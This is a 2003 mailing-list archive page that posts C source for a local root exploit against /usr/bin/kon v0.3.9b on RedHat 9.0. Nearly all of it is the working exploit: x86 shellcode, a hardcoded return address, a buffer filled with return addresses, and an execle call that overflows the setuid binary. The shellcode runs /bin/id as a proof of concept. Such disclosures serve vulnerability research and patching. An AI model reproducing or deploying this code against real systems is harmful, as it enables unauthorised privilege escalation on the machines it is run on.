('binary' encoding is not supported, stored as-is) /* * Buffer overflow in /usr/bin/kon v0.3.9b for RedHat 9.0 * * bugtraqat_private/msg11681.html">http://www.mail-archive.com/bugtraqat_private/msg11681.html * * The original bug was found by wszx for RedHat 8.0 - Ported to C * * Compile: gcc -Wall kon2root kon2root.c * */ #include <stdio.h> #include <string.h> #include <unistd.h> #define NOP 0x90 #define RET 0xbffffffa #define VULN "/usr/bin/kon" #define MAXBUF 800 static char w00tI4r3l33t[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07 \x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56 \x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8 \xdc\xff" "\xff\xff/bin/id"; int main() { int i, *egg; long retaddr; static char buff[MAXBUF]; static char *sploit[0x02] = { w00tI4r3l33t, NULL }; fprintf (stdout, "\n\n\n[ PoC code for local root exploit in %s ] \n", VULN); fprintf (stdout, "[ Coded by c0ntex - http://62.31.72.168 ]\n"); fprintf (stdout, "[ For Linux RedHat v9 x86 - Ret_Addr 0xbffffffa ]\n\n\n\n"); if((retaddr = 0xbffffffa - strlen(w00tI4r3l33t) - strlen(VULN)) ! = 0x00) { egg = (int *)(buff); } for(i = 0x00; i < MAXBUF; i += 0x04) *(egg)++ = retaddr; *(egg) = NOP; execle(VULN, VULN, "-Coding", buff, NULL, sploit); return(0x00); }
This archive was generated by hypermail 2b30 : Mon Jun 16 2003 - 09:02:14 PDT